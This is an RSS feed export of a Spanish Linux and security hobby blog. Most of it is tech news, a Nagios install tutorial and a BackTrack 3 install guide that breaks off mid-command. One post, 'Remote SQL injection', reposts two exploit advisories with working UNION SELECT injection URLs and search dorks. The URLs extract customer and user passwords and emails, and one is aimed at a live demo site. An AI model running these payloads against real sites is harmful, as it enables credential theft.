<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-11983284204523461</atom:id><lastBuildDate>Mon, 09 Nov 2009 00:00:14 +0000</lastBuildDate><title>The zerial killer --&gt; de Gnu/Linux y mas....</title><description></description><link>http://zerialkiller.blogspot.com/</link><managingEditor>noreply@blogger.com (zerial killer)</managingEditor><generator>Blogger</generator><openSearch:totalResults>71</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-722995693768879977</guid><pubDate>Mon, 03 Aug 2009 17:55:00 +0000</pubDate><atom:updated>2009-08-03T13:19:33.725-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>boots</category><category domain='http://www.blogger.com/atom/ns#'>botnets</category><category domain='http://www.blogger.com/atom/ns#'>spam</category><title>Spam y los botnets alcanzan máximos históricos</title><description>El volumen de spam ha aumentado un 141% desde marzo, lo que significa el mayor aumento hasta ahora, según el Informe de amenazas del segundo trimestre realizado por McAfee. El documento destaca la dramática expansión de botnets (zombis) y amenazas de malware Auto-Run (de ejecución automática). &lt;br /&gt;&lt;br /&gt;Este trimestre hay más de 14 millones de nuevos ordenadores zombis, un 16% más que en el trimestre anterior. Este informe ha confirmado la predicción que McAfee realizó en el informe del primer trimestre sobre el crecimiento de los botnets, afirmando que el spam alcanzaría nuevos límites, superando su propio récord de octubre de 2008, antes del cierre de McColo.&lt;br /&gt;&lt;br /&gt;Los investigadores de McAfee han observado que el malware Auto –Run ha infectado más de 27 millones de archivos en un período de 30 días. Este tipo de malware aprovecha las cualidades Auto-Run de Windows, no necesita que el usuario lo active y suele propagarse a través de USB y dispositivos de almacenamiento. El ratio de detección supera incluso al de Conficker por un 400%, haciendo del malware basado en Auto-Run el más detectado a nivel mundial.&lt;br /&gt;&lt;br /&gt;“El salto en la actividad de botnets y spam que hemos presenciado en los últimos tres meses es alarmante, y las amenazas de malware Auto-Run continúan creciendo", afirma Mike Gallagher, Vicepresidente Senior y Director de la Oficina de Tecnología de los Laboratorios McAfee Avert. “La expansión de estas infecciones es un grave recordatorio del daño que pueden sufrir los ordenadores desprotegidos, sean domésticos o empresariales."&lt;br /&gt;&lt;br /&gt;Como el número de botnets continúa creciendo, los creadores de malware han empezado a ofrecer software malicioso como servicio a quienes controlan ordenadores zombis. Mediante intercambio o venta de recursos, los cibercriminales distribuyen instantáneamente nuevo malware a un público más amplio. Programas como Zeus – una herramienta de creación de troyanos ladrones de contraseñas de uso sencillo – facilitan la creación y gestión de troyanos.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-722995693768879977?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2009/08/spam-y-los-botnets-alcanzan-maximos.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-3687148799243656704</guid><pubDate>Sun, 26 Jul 2009 18:20:00 +0000</pubDate><atom:updated>2009-07-26T13:21:03.800-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>windows 7</category><category domain='http://www.blogger.com/atom/ns#'>windows7</category><title>Se inicia la distribución de Windows 7 entre fabricantes de PC</title><description>La versión final de Windows 7 tiene la denominación Build 7600 informa Brandon LeBlanc, desarrollador de Microsoft,  en el blog de Windows Team.&lt;br /&gt;Por su parte, Oliver Rist, director técnico del producto Windows Server, se refiere a Windows Server 2008 R2 en el blog de la División Windows Server de Microsoft.&lt;br /&gt;&lt;br /&gt;Las versiones de evaluación de Windows Server 2008 R2 estarán disponibles a partir de la primera quincena de agosto. La versión completa del software para servidores será distribuida entre abonados a Software Assurance durante la segunda quincena de agosto.&lt;br /&gt;&lt;br /&gt;Rist informa además que los clientes con Windows Server 2008 no necesitarán adquirir nuevas licencias de tipo Client Acces Licenses (CALs) para actualizar a Windows Server 2008 R2.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3687148799243656704?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2009/07/se-inicia-la-distribucion-de-windows-7.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-1827462490832437094</guid><pubDate>Mon, 20 Jul 2009 18:33:00 +0000</pubDate><atom:updated>2009-07-20T14:08:17.640-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>applets</category><category domain='http://www.blogger.com/atom/ns#'>noticias</category><category domain='http://www.blogger.com/atom/ns#'>mac</category><title>Campaña publicitaria de Microsoft causa indignación en Apple</title><description>Normalmente, Apple intenta "hacerse la graciosa" a costa de Microsoft mediante su campaña publicitaria Get a Mac. Sin embargo, todo indica que la propia Apple es&lt;br /&gt;incapaz de probar su propia medicina. &lt;br /&gt;&lt;br /&gt;Tal es la conclusión de Microsoft después de conocer la&lt;br /&gt;reacción de Apple frente a su campaña publicitaria "Laptop&lt;br /&gt;Hunters".&lt;br /&gt;&lt;br /&gt;En los comerciales de la serie se observa a potenciales&lt;br /&gt;compradores interesados en un PC portátil bueno y barato.&lt;br /&gt;Como podría esperarse, el resultado no es que decidan&lt;br /&gt;comprar una Macintosh. En el comercial se presenta una&lt;br /&gt;Mac, con la conclusión de que es demasiado costosa.&lt;br /&gt;&lt;br /&gt;Esta situación activó al departamento jurídico de Apple, que exigió a Microsoft cancelar su campaña.&lt;br /&gt;&lt;br /&gt;En el comercial se entrega a los potenciales compradores&lt;br /&gt;1.000 dólares con los que comprar un nuevo laptop. Cuando&lt;br /&gt;llega el momento de ver una Mac, la respuesta es que es&lt;br /&gt;demasiado costosa. Sin embargo, el departamento jurídico&lt;br /&gt;de Apple indica que Microsoft debió haber sabido que Apple&lt;br /&gt;acababa de aplicar una ligera rebaja en sus precios, de&lt;br /&gt;forma que la Macintosh más económica podía ser adquirida&lt;br /&gt;por 999 dólares.&lt;br /&gt;&lt;br /&gt;La reacción de Apple fue comentada en la conferencia de&lt;br /&gt;partners de Microsoft, realizada en Nueva Orleáns la semana pasada, donde el vicepresidente de Microsoft, Kevin Turner, indicó que la única reacción que generaría es incrementar la visibilidad de la campaña, en ningún caso reducirla.&lt;br /&gt;&lt;br /&gt;En la misma conferencia, Turner anunció que Microsoft&lt;br /&gt;lanzaría tiendas propias al igual que Apple. El ejecutivo&lt;br /&gt;recalcó que las tiendas serían colocadas en las cercanías de los comercios de Apple.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1827462490832437094?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2009/07/campana-publicitaria-de-microsoft-causa.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-6546888914643313776</guid><pubDate>Fri, 17 Jul 2009 05:46:00 +0000</pubDate><atom:updated>2009-07-17T00:47:41.992-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Microsoft: "Chrome OS es un comentario en un blog"</category><title>Microsoft: "Chrome OS es un comentario en un blog"</title><description>Microsoft continúa su embestida contra Google, señalando que no siente incomodidad alguna frente al futuro sistema operativo Chrome.&lt;br /&gt;&lt;br /&gt;Diario Ti: Microsoft expresa indiferencia ante los planes de Google de lanzar en 2010 su sistema operativo basado en código abierto. "Por ahora, Chrome es un simple comentario en un blog", comenta Bill Veghte, portavoz de Microsoft, a la agencia de noticias DPA, haciendo referencia al blog oficial de Google, donde Chrome OS fue anunciado la semana pasada. &lt;br /&gt;&lt;br /&gt;El sistema operativo basado en Linux estará disponible para netbooks durante el segundo semestre de 2010.&lt;br /&gt;&lt;br /&gt;Microsoft fundamenta su observación señalando que pasó mucho tiempo antes que Google lanzara definitivamente su paquete de aplicaciones ofimáticas en línea, que fueron consideradas como una alternativa a Office. En este contexto, cabe señalar que la propia Microsoft prepara versiones en línea de su paquete Office.&lt;br /&gt;&lt;br /&gt;Esta semana, Microsoft organiza una conferencia a gran escala para partners en Nueva Orleans. El evento contará con la asistencia de 9.000 socios comerciales de Microsoft, y se espera que la atención se concentre en Windows 7. El interés primordial de Microsoft es asegurar que el "ecosistema" necesario funcione adecuadamente, es decir, que aplicaciones y componentes de hardware y software sean compatibles con la nueva plataforma.&lt;br /&gt;&lt;br /&gt;"Este ecosistema está listo gracias al apoyo que nos brindan nuestros partners", comentó Veghte.&lt;br /&gt;&lt;br /&gt;Según cifras de la propia Microsoft, 16.000 partners desarrollan software específicamente para la plataforma Windows 7.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6546888914643313776?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2009/07/microsoft-chrome-os-es-un-comentario-en.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-7109002967772237937</guid><pubDate>Tue, 08 Jul 2008 01:52:00 +0000</pubDate><atom:updated>2008-07-07T21:06:05.785-05:00</atom:updated><title>NOS MUDAMOS!!!!!</title><description>Hola a todos me he cambiado para &lt;a href="http://zerialkiller.h4ck3rx.org/"&gt; www.zerialkiller.h4ck3rx.org &lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Nos vemos por alla  XD .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-7109002967772237937?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/07/nos-mudamos.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-6312164929251468305</guid><pubDate>Sat, 05 Jul 2008 00:06:00 +0000</pubDate><atom:updated>2008-07-04T19:20:00.253-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>nagios en debian lenny</category><category domain='http://www.blogger.com/atom/ns#'>linux</category><title>Nagios en debian lenny</title><description>&lt;a href="http://www.nagios.org/"&gt;Nagios&lt;/a&gt; es un sistema de código abierto de monitorización de redes, máquinas, servicios, sistemas, filesystems... .Es muy flexible ya que permite definir distintos tipos de alertas en función de la disponibilidad de los objetos monitorizados.&lt;br /&gt;&lt;br /&gt;En este mi-ni tuto instalaremos la ultima versión de nagios, Versión 3.0.3. Para poder hacer funcionar nagios necesitamos tener instalado apache, en mi caso sera apache2 (yo lo tengo con soporte a php y a mysql pero creo que no es necesario tener eso solo con el apache es mas que suficiente) .&lt;br /&gt;&lt;br /&gt;Si no tienes apache basta con teclear los siguiente.&lt;br /&gt;&lt;br /&gt;#apt-get install apache2&lt;br /&gt;&lt;br /&gt;ahora necesitamos el entorno de compilacion.&lt;br /&gt;&lt;br /&gt;#apt-get install build-essential&lt;br /&gt;&lt;br /&gt;Necesitaremos las siguientes librerías para la compilación de nagios&lt;br /&gt;&lt;br /&gt;#apt-get install libjpeg62 libjpeg62-dev libpng12-0 libpng12-dev&lt;br /&gt;&lt;br /&gt;Tambien necesitaremos las librerías gd2.&lt;br /&gt;&lt;br /&gt;TODO LO QUE DESCARGEMOS LO GUARDAREMOS EN /tmp . &lt;br /&gt;&lt;br /&gt;#cd /tmp&lt;br /&gt;#wget -c http://www.libgd.org/releases/gd-2.0.35.tar.gz   ---&gt; descargamos gd2&lt;br /&gt;#tar xzf gd-2.0.35.tar.gz  ---&gt; descomprimimos gd2&lt;br /&gt;#cd gd-2.0.35  ---&gt; accedemos al directorio de gd2&lt;br /&gt;&lt;br /&gt;ahora el proceso de configuracion y compilacion.&lt;br /&gt;#./configure&lt;br /&gt;#make &lt;br /&gt;#make install&lt;br /&gt;&lt;br /&gt;ahora creamos los usuarios y grupos necesarios.&lt;br /&gt;&lt;br /&gt;#useradd nagios ---&gt; creamos el usuario nagios&lt;br /&gt;#passwd nagios ---&gt; password para nagios &lt;br /&gt;#groupadd nagios ---&gt; añadimos el grupo&lt;br /&gt;#groupadd nagcmd ---&gt; otro mas&lt;br /&gt;#usermod -G nagios nagios &lt;br /&gt;#usermod -G nagios tu_usuario&lt;br /&gt;#usermod -G nagcmd nagios&lt;br /&gt;#usermod -G nagcmd www-data&lt;br /&gt;&lt;br /&gt;Ya tenemos los usuarios para Nagios, para el Apache y el nuestro propio para poder editar los ficheros de configuración. &lt;br /&gt;Ahora a compilar y configurar nagios.&lt;br /&gt;&lt;br /&gt;Descargamos nagios y sus Plugins de su pagina oficial y los guardamos en /tmp&lt;br /&gt;&lt;a href="http://www.nagios.org/"&gt;Nagios ---&gt; www.nagios.org&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;o tmb de &lt;a href="http://sourceforge.net/"&gt;sourceforge &lt;/a&gt; aquí les dejo los enlaces directos de la vercion 3.0.3 de nagios y de sus plugins.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/project/downloading.php?groupname=nagios&amp;filename=nagios-3.0.3.tar.gz&amp;use_mirror=osdn"&gt; Nagios 3.0.3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; &lt;a href="http://sourceforge.net/project/downloading.php?group_id=29880&amp;use_mirror=internap&amp;filename=nagios-plugins-1.4.12.tar.gz&amp;64975492"&gt;PLUGINS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/project/downloading.php?groupname=nagios&amp;filename=nrpe-2.12.tar.gz&amp;use_mirror=internap"&gt; PLUGINS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ahora bien accedemos al directorio donde las descargamos&lt;br /&gt;&lt;br /&gt;#cd /tmp  --&gt; directorio en donde descargue nagios y plugins &lt;br /&gt;#tar xzf nagios-3.0.3.tar.gz ---&gt; descomprimimos nagios &lt;br /&gt;# tar xzf nagios-plugins-1.4.12.tar.gz ---&gt; descomprimimos los plugins&lt;br /&gt;&lt;br /&gt;una ves descomprimidos los plugins y nagios pasaremos ala parte de compilación, primero entramos al directorio de nagios.&lt;br /&gt;&lt;br /&gt;#cd nagios-3.0.3&lt;br /&gt;#./configure --with-command-group=nagcmd&lt;br /&gt;#make all&lt;br /&gt;#make install&lt;br /&gt;#make install-init&lt;br /&gt;#make install-config&lt;br /&gt;#make install-commandmode&lt;br /&gt;#make install-webconf&lt;br /&gt;&lt;br /&gt;ahora pasaremos al directorio de los plugins para su configuración.&lt;br /&gt;&lt;br /&gt;#cd /tmp/nagios-plugins-1.4.12&lt;br /&gt;&lt;br /&gt;#./configure --with-nagios-user=nagios --with-nagios-group=nagios&lt;br /&gt;#make&lt;br /&gt;#make install&lt;br /&gt;&lt;br /&gt;ahora toca crear una contraseña para el usuario nagiosadmin y reiniciar el Apache.&lt;br /&gt;&lt;br /&gt;#htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin&lt;br /&gt;#cd /etc/init.d/&lt;br /&gt;#./apache2 restart&lt;br /&gt;&lt;br /&gt;Arrancamos el Nagios.&lt;br /&gt;&lt;br /&gt;#./nagios start&lt;br /&gt;&lt;br /&gt;ahora abrimos nuestro navegador y tecleamos http://localhost/nagios/&lt;br /&gt;deberá mostrarnos una ventana de login para el usuario de nagios y su respectiva contraseña, después de teclear el user y el pass correctamente accederemos a nagios.&lt;br /&gt;&lt;br /&gt;Podemos crear un enlace para el arranque automático &lt;br /&gt;&lt;br /&gt;#ln -s /etc/init.d/nagios /etc/rcS.d/S99nagios&lt;br /&gt;&lt;br /&gt;aki una pantalla del buen Nagios.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_OdUSaKBFEPk/SG67lvjtuUI/AAAAAAAAAJY/aJAq8wMWTsc/s1600-h/nagios.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_OdUSaKBFEPk/SG67lvjtuUI/AAAAAAAAAJY/aJAq8wMWTsc/s200/nagios.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5219315275264801090" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6312164929251468305?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/07/nagios-en-debian-lenny.html</link><author>noreply@blogger.com (zerial killer)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_OdUSaKBFEPk/SG67lvjtuUI/AAAAAAAAAJY/aJAq8wMWTsc/s72-c/nagios.png' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-6149734602785718635</guid><pubDate>Wed, 02 Jul 2008 18:01:00 +0000</pubDate><atom:updated>2008-07-02T13:06:45.355-05:00</atom:updated><title>10 razones de que Windows Vista es un buen sistema operativo</title><description>WTF que PTM es esto   °_°   ¬¬  NO MAMEN .&lt;br /&gt;&lt;br /&gt;Pondre el articulo tal y como lo encontre.&lt;br /&gt; &lt;br /&gt;El sistema operativo Windows Vista ha recibido algunas críticas desde su lanzamiento hace más de un año. ¿Pero es realmente un sistema que "deja mucho que desear"?. El sitio Gizmodo presenta 10 razones que sugieren lo contrario. &lt;br /&gt;&lt;br /&gt;Diario Ti: Con el fin de contrarrestar las opiniones en el sentido que Windows Vista sería un sistema operativo inconcluso y deficiente, el sitio Gizmodo ha publicado un análisis, con una lista de las 10 razones que convierten a Windows Vista en una buena opción.&lt;br /&gt;&lt;br /&gt;1. Windows Vista es más seguro que Windows XP.&lt;br /&gt;2. El interfaz de Windows Vista es mucho más atractivo que todas las versiones anteriores de Windows.&lt;br /&gt;3. Windows Vista tiene una óptima capacidad de ejecución de juegos, muy similar a Windows XP.&lt;br /&gt;4. El Media Center de Vista es excelente para la grabación de vídeo.&lt;br /&gt;5. La función de suspensión de Windows Vista funciona “de maravillas".&lt;br /&gt;6. La función User Account Control es altamente beneficiosa para “numerosos" usuarios.&lt;br /&gt;7. El soporte para conectores es óptimo en Windows Vsta.&lt;br /&gt;8. No hay más bugs (errores de código) en Windows Vista que en Windows XP.&lt;br /&gt;9. Al contar con suficiente RAM, Windows Vista no es lento.&lt;br /&gt;10. La función de búsqueda en el disco duro es óptima.&lt;br /&gt;&lt;br /&gt;En todo caso, el autor del artículo no se muestra incondicionalmente positivo frente a Windows Vista. Hay varios puntos que le gustaría fuesen distintos. Por ejemplo, algunas conocidas funciones de Windows XP han sido cambiadas de lugar, lo que prolonga innecesariamente el tiempo de adaptación al software. Otro elemento que le causa molestia es la configuración de redes, que considera innecesariamente demorosa.&lt;br /&gt;&lt;br /&gt;La argumentación completa puede ser vista en el sitio de Gizmodo (ver enlace).&lt;br /&gt;&lt;br /&gt;Fuente : &lt;a href="http://www.diarioti.com/gate/n.php?id=18304"&gt;DiarioTI&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;JAAJJAAJ posiblemente tengan razon son 10 razones por las que guindous vista es "bueno", pero yo a gnu/linux le encuentro facil mas de 50 =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6149734602785718635?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/07/10-razones-de-que-windows-vista-es-un.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-2550355807155296801</guid><pubDate>Wed, 02 Jul 2008 00:29:00 +0000</pubDate><atom:updated>2008-07-01T19:52:37.800-05:00</atom:updated><title>MEME:  Blogs</title><description>Este es un Tipo de “meme”  que vi en un sitio de por hay que trata sobre los blogs.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5 amigos cuyos blogs sin duda disfrutaría leer&lt;br /&gt;&lt;br /&gt;1-http://gndx.org/&lt;br /&gt;2-http://movimientolibre&lt;br /&gt;3-http://fivenix.blogspot.com/&lt;br /&gt;4-http://www.antoniomtz.org/&lt;br /&gt;5-http://www.riveonline.com/&lt;br /&gt;&lt;br /&gt;5 blogs que leería con placer morboso Y/O ociosos&lt;br /&gt; &lt;br /&gt;1-http://www.socwall.com/&lt;br /&gt;2-http://www.totallygeek.com/vscdb/index.php&lt;br /&gt;3-http://linuxman.blogsome.com/&lt;br /&gt;4-http://www.gnome-look.org/&lt;br /&gt;5-http://art.gnome.org/&lt;br /&gt;&lt;br /&gt;5 blogs que nunca leería&lt;br /&gt;&lt;br /&gt;1-Uno sobre Lopez obrador &lt;br /&gt;2-Uno sobre Porno Infantil &lt;br /&gt;3-Uno sobre Putos --&gt;Como el hiram y sus metroflogs&lt;br /&gt;4-Uno sobre pokemon --&gt; JAJA&lt;br /&gt;5-Uno sobre Guindows --&gt; JOJOJO&lt;br /&gt;&lt;br /&gt;5 blogs recomendables   (pues mas que nada son mis webs favoritas ) &lt;br /&gt;&lt;br /&gt;1-http://www.milw0rm.com/&lt;br /&gt;2-http://packetstormsecurity.org/&lt;br /&gt;3-http://www.remote-exploit.org/&lt;br /&gt;4-http://www.securityfocus.com/&lt;br /&gt;5-http://www.metasploit.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;este meme se lo dejo a: &lt;a href="http://gndx.org/"&gt;GNDX&lt;/a&gt; &lt;a href="http://jorgemorales.com.mx/"&gt;Jmorales&lt;/a&gt; &lt;a href="http://fivenix.blogspot.com/"&gt;PAkO V. (cerillo)&lt;/a&gt; &lt;a href="http://www.antoniomtz.org/"&gt;Antonio Martinez&lt;/a&gt; &lt;a href="http://www.riveonline.com/"&gt;Rive&lt;/a&gt; &lt;a href="http://thebucio.org/"&gt;bucio&lt;/a&gt; y a quien lo quiera contestar.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2550355807155296801?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/07/meme-blogs.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-5406172415190510595</guid><pubDate>Mon, 30 Jun 2008 06:14:00 +0000</pubDate><atom:updated>2008-06-30T01:16:47.805-05:00</atom:updated><title>Remote SQL injection</title><description>## AUTHOR : JuDge&lt;br /&gt;                           &lt;br /&gt;   ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com&lt;br /&gt;                          &lt;br /&gt;  ## Script WebSite:http://www.eshop100.co.uk&lt;br /&gt;&lt;br /&gt; ##Dork::)&lt;br /&gt;&lt;br /&gt;##DescRipTiON: pull customers info from database&lt;br /&gt;   &lt;br /&gt;##EXPLOITS:&lt;br /&gt;                 www.victim.com/index.php?CATEGORY=2&amp;SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*&lt;br /&gt;            &lt;br /&gt;&lt;br /&gt;            ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&amp;SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#AcmlmBoard v1.A2 SQL Injection Vulnerability&lt;br /&gt;#&lt;br /&gt;######################&lt;br /&gt;#&lt;br /&gt;#Bug by: h0yt3r&lt;br /&gt;#&lt;br /&gt;#Dork: "AcmlmBoard v1.A2"&lt;br /&gt;#&lt;br /&gt;##&lt;br /&gt;###&lt;br /&gt;##&lt;br /&gt;#&lt;br /&gt;#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.&lt;br /&gt;#An Attacker can easily get sensitive information from the database by&lt;br /&gt;#injecting unexpected SQL Querys.&lt;br /&gt;#&lt;br /&gt;#SQL Injection:&lt;br /&gt;#http://[target]/[path]/memberlist.php?sort=&amp;pow=[SQL]&lt;br /&gt;#&lt;br /&gt;#PoC:&lt;br /&gt;#memberlist.php?sort=&amp;pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+&lt;br /&gt;#&lt;br /&gt;#######################&lt;br /&gt;#&lt;br /&gt;#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!&lt;br /&gt;#&lt;br /&gt;#######################&lt;br /&gt;#######################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5406172415190510595?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/remote-sql-injection.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-5624125887819055449</guid><pubDate>Sat, 28 Jun 2008 17:48:00 +0000</pubDate><atom:updated>2008-06-28T12:51:23.636-05:00</atom:updated><title>video en YouTube, donde invita a descargar ilegalmente música</title><description>Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música. &lt;br /&gt;Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".&lt;br /&gt;&lt;br /&gt;aqui al link: &lt;a href="http://mx.youtube.com/user/kidrockvideos?ob=4"&gt;KID ROCK --&gt; roba todo lo que puedas&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5624125887819055449?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/video-en-youtube-donde-invita-descargar.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-200689987148205388</guid><pubDate>Fri, 27 Jun 2008 16:19:00 +0000</pubDate><atom:updated>2008-06-27T11:26:05.953-05:00</atom:updated><title>Una Guia Linuxera, Para un Windolero</title><description>Hola que tal, navegando ayer por el foro de &lt;a href="http://foro.elhacker.net/"&gt;elhacker&lt;/a&gt; me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link&lt;br /&gt;&lt;br /&gt;&lt;a href="http://portallinux.wordpress.com/2008/06/26/una-guia-linuxera-para-un-windolero/"&gt; Una Guia Linuxera, Para un Windolero &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-200689987148205388?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/una-guia-linuxera-para-un-windolero.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-6138677000830985770</guid><pubDate>Mon, 23 Jun 2008 07:12:00 +0000</pubDate><atom:updated>2008-06-24T21:04:55.331-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>instalar backtrack3</category><title>Como Instalar Back|Track 3</title><description>Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos&lt;br /&gt;&lt;br /&gt;bt~#mkdir /mnt/backtrack3 ---&gt; creamos una carmeta dentro /mnt&lt;br /&gt;bt~#mount /dev/sda10 /mnt/backtrack3/ --&gt; montamos la particion donde queremos instalar /dev/sda10&lt;br /&gt;bt~#mkdir /mnt/backtrack3/boot/ ---&gt; creamos otro directorio&lt;br /&gt;bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---&gt; instalamos tardara unos minutos &lt;br /&gt;&lt;br /&gt;####----&gt; despues de que termine con la instalacion terminamos con esto. -----------####&lt;br /&gt;&lt;br /&gt;bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}&lt;br /&gt;bt~#mount --bind /dev/ /mnt/backtrack3/dev/&lt;br 